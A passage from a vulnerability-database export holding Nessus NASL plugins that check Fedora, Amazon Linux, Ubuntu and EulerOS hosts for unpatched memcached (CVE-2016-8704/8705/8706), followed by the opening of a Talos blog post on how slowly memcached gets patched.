FEDORA-2016-0c4e822340.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95611);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_xref(name:\"FEDORA\", value:\"2016-0c4e822340\");\n\n script_name(english:\"Fedora 25 : memcached (2016-0c4e822340)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to the latest upstream release, which fixes CVE-2016-8704,\nCVE-2016-8705, CVE-2016-8706.\n\nNote that Tenable Network Security has extracted the 
preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-0c4e822340\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected memcached package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:memcached\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"memcached-1.4.33-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"memcached\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:19:28", "description": "An integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the memcached binary protocol. An attacker could create a\nspecially crafted message that would cause the memcached server to\ncrash or, potentially, execute arbitrary code. 
(CVE-2016-8704 ,\nCVE-2016-8705)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in memcached's parsing of SASL authentication messages. An\nattacker could create a specially crafted message that would cause the\nmemcached server to crash or, potentially, execute arbitrary code.\n(CVE-2016-8706)", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-11T00:00:00", "title": "Amazon Linux AMI : memcached (ALAS-2016-761)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:memcached-debuginfo", "p-cpe:/a:amazon:linux:memcached-devel", "p-cpe:/a:amazon:linux:memcached", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-761.NASL", "href": "https://www.tenable.com/plugins/nessus/94681", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-761.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94681);\n script_version(\"2.4\");\n script_cvs_date(\"Date: 2018/04/18 15:09:36\");\n\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_xref(name:\"ALAS\", value:\"2016-761\");\n\n script_name(english:\"Amazon Linux AMI : memcached (ALAS-2016-761)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the memcached binary protocol. An attacker could create a\nspecially crafted message that would cause the memcached server to\ncrash or, potentially, execute arbitrary code. 
(CVE-2016-8704 ,\nCVE-2016-8705)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in memcached's parsing of SASL authentication messages. An\nattacker could create a specially crafted message that would cause the\nmemcached server to crash or, potentially, execute arbitrary code.\n(CVE-2016-8706)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-761.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update memcached' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:memcached\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:memcached-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:memcached-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) 
audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"memcached-1.4.15-9.13.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"memcached-debuginfo-1.4.15-9.13.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"memcached-devel-1.4.15-9.13.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"memcached / memcached-debuginfo / memcached-devel\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T06:44:07", "description": "Aleksandar Nikolic discovered that Memcached incorrectly handled\ncertain malformed commands. A remote attacker could use this issue to\ncause Memcached to crash, resulting in a denial of service, or\npossibly execute arbitrary code.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-03T00:00:00", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS / 16.10 : memcached vulnerabilities (USN-3120-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:memcached", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:16.10", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3120-1.NASL", "href": "https://www.tenable.com/plugins/nessus/94509", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3120-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94509);\n script_version(\"2.5\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_xref(name:\"USN\", value:\"3120-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS / 16.10 : memcached vulnerabilities (USN-3120-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Aleksandar Nikolic discovered that Memcached incorrectly handled\ncertain malformed commands. 
A remote attacker could use this issue to\ncause Memcached to crash, resulting in a denial of service, or\npossibly execute arbitrary code.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3120-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected memcached package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:memcached\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|16\\.04|16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 16.04 / 16.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"memcached\", pkgver:\"1.4.13-0ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"memcached\", pkgver:\"1.4.14-0ubuntu9.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"memcached\", pkgver:\"1.4.25-2ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"memcached\", pkgver:\"1.4.25-2ubuntu2.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"memcached\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T08:51:48", "description": "According to the versions of the memcached package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Two integer overflow 
flaws, leading to heap-based\n buffer overflows, were found in the memcached binary\n protocol. An attacker could create a specially crafted\n message that would cause the memcached server to crash\n or, potentially, execute arbitrary code.\n (CVE-2016-8704, CVE-2016-8705)\n\n - An integer overflow flaw, leading to a heap-based\n buffer overflow, was found in memcached's parsing of\n SASL authentication messages. An attacker could create\n a specially crafted message that would cause the\n memcached server to crash or, potentially, execute\n arbitrary code.(CVE-2016-8706)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : memcached (EulerOS-SA-2016-1086)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2017-05-01T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:memcached", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2016-1086.NASL", "href": "https://www.tenable.com/plugins/nessus/99845", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99845);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-8704\",\n \"CVE-2016-8705\",\n \"CVE-2016-8706\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : memcached (EulerOS-SA-2016-1086)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security 
updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the memcached package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Two integer overflow flaws, leading to heap-based\n buffer overflows, were found in the memcached binary\n protocol. An attacker could create a specially crafted\n message that would cause the memcached server to crash\n or, potentially, execute arbitrary code.\n (CVE-2016-8704, CVE-2016-8705)\n\n - An integer overflow flaw, leading to a heap-based\n buffer overflow, was found in memcached's parsing of\n SASL authentication messages. An attacker could create\n a specially crafted message that would cause the\n memcached server to crash or, potentially, execute\n arbitrary code.(CVE-2016-8706)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1086\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ed837d0e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected memcached packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:memcached\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"memcached-1.4.15-9.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n 
tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"memcached\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:14:20", "description": "Security fix for CVE-2016-8704, CVE-2016-8705, CVE-2016-8706\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-15T00:00:00", "title": "Fedora 24 : memcached (2016-66c70cadb4)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2016-11-15T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:memcached", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-66C70CADB4.NASL", "href": "https://www.tenable.com/plugins/nessus/94814", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-66c70cadb4.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94814);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_xref(name:\"FEDORA\", value:\"2016-66c70cadb4\");\n\n script_name(english:\"Fedora 24 : memcached (2016-66c70cadb4)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security 
fix for CVE-2016-8704, CVE-2016-8705, CVE-2016-8706\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-66c70cadb4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected memcached package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:memcached\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"memcached-1.4.25-2.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"memcached\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2017-07-29T13:22:40", "bulletinFamily": "blog", "cvelist": ["CVE-2016-8704", "CVE-2016-8706"], "description": "<i>This blog authored by Aleksandar Nikolich and <a href=\"https://twitter.com/dave_maynor\">David Maynor</a> with contributions from Nick Biasini</i><br /><br /><h2 id=\"h.td0sd1w6neqn\">Memcached - Not secure, Not Patched Fast Enough</h2><h2 id=\"h.td0sd1w6neqn\"> </h2>Recently high profile 
vulnerabilities in systems were used to unleash several global ransomware attacks that greatly impacted organizations. These types of vulnerabilities were previously patched and could have been addressed by organizations before the attacks commenced. This is just the latest example in a long line of threats that are successful in large part because of the inability for patches to be applied in a timely and effective manner. In late 2016 Talos disclosed a series of <a href=\"http://blog.talosintelligence.com/2016/10/memcached-vulnerabilities.html\">vulnerabilities</a> in a software platform called Memcached. After releasing the vulnerabilities Talos has been monitoring the number of systems that were vulnerable as well as the rate at which they have been patched. This blog will give a quick overview of the vulnerabilities and discuss the unfortunate findings of the Internet-wide scans that we have been conducting over the last six months.<br /><br /><h3 id=\"h.q2uv63tp0nfw\">What is Memcached?</h3><br />Memcached is a high performance object caching server intended for speeding up dynamic web applications and is used by some of the most popular Internet websites. It has two versions of the protocol for storing and retrieving arbitrary data, an ASCII based one and a binary one. The binary protocol is optimized for size.<br /><br />Its intended use is to be accessed by the web application servers, and it should never under any circumstances be exposed to an untrusted environment. Newer versions of the server include basic authentication support based on SASL which, based on our findings, is seldom used.<br /><h3 id=\"h.16cz4o7xq5rp\">Audit and Vulnerabilities</h3><br />In October last year, we performed a source code audit of the Memcached server and identified three distinct but similar vulnerabilities. All three are in the implementation of the binary protocol. 
Two vulnerabilities lie in the part of the code dealing with adding and updating cached objects, while the third is in the aforementioned SASL authentication mechanism. All three vulnerabilities are due to integer overflows leading to controlled heap buffer overflows and, due to the nature of the protocol, can be abused for sensitive memory disclosure, which can lead to straightforward and reliable exploitation.<br /><br />The vendor was notified and promptly issued a patch that we have verified as sufficient. Public release of the new patched version was on October 31st. The CVE ID assigned to this vulnerability is CVE-2016-8704 and was tracked by us as TALOS-2016-0219. Quickly after the public release, major Linux distributions issued updates and advisories of their own. One key thing to note is that major distributions (Ubuntu, Fedora...) backported patches without bumping up the version number of the server. References:<br /><br /><ul><li><a href=\"http://www.talosintelligence.com/reports/TALOS-2016-0219/\">http://www.talosintelligence.com/reports/TALOS-2016-0219/</a></li><li><a 